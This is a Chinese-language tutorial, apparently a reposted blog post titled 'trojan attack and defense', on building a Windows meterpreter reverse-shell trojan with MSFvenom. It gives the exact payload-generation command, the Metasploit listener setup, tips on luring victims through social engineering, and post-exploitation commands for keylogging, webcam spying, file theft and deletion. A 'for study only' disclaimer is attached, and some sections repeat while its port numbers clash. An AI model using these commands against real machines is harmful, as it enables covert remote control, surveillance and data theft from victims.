文章目錄

• • • 01 木馬概述
    • 02 木馬的組成
    • 03 木馬的危害
    • 04 利用MSFvenom制作木馬
    • 05 開啟針對 reverse_ tcp監(jiān)聽得端口
    • 06 客戶運行木馬
    • 07 木馬反彈shell成功
    • 08 操作
    • 免責聲明

01 木馬概述

• 木馬通常稱為黑客程序惡意代碼也稱為特洛伊木馬。
• 基于遠程控制的黑客工具

02 木馬的組成

• 客戶端程序(生成木馬)
  客戶端程序黑客方的控制臺,它負責遠程遙控指揮

• 服務器端程序(被攻擊方)
  服務器端程序即是木馬程序,它被隱藏安裝在被攻擊(受害)方的電腦上,目標主機也稱為肉雞

03 木馬的危害

• 盜取用戶信息
  如:網游賬戶、網銀信息、QQ密碼等
• 占用系統(tǒng)資源,降低電腦效能
• 將本機作為工具來攻擊其他設備,也稱為肉雞

04 利用MSFvenom制作木馬

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.232.140 lport=8888 -f exe -o qwe.exe-p payload -f 生成文件的后綴名 -o 生成的文件名稱

05 開啟針對 reverse_ tcp監(jiān)聽得端口

攻擊方開啟4444窗口 msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.232.140set lport 8888exploit/run

06 客戶運行木馬

此處需要運用到社會工程學,如軟件綁定偽裝、郵件偽裝、木馬網頁、二維碼等

將生成的木馬傳到被攻擊的主機，并點擊運行

07 木馬反彈shell成功

08 操作

• 查看系統(tǒng)信息

sysinfo ipconfig id whoami

• 切換路徑與瀏覽內容

pwd dir cd dir 路徑 download 文件名 upload 文件名

• 刪除文件

rm 路徑 文件 rmdir 路徑 文件夾

• 鍵盤記錄

screenshot ps | grep notepad migrate PID run post/windows/capture/keylog_recorder

• 攝像頭監(jiān)控

help webcam webcam_snap webcam_stream

• 關機

shutdown

• 攝像頭監(jiān)控

help webcam webcam_snap webcam_stream

• 關機

shutdown

免責聲明

本文檔供學習，請使用者注意使用環(huán)境并遵守國家相關法律法規(guī)!由于使用不當造成的后果上傳者概不負責！

總結

以上是生活随笔為你收集整理的木马攻击与防御的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。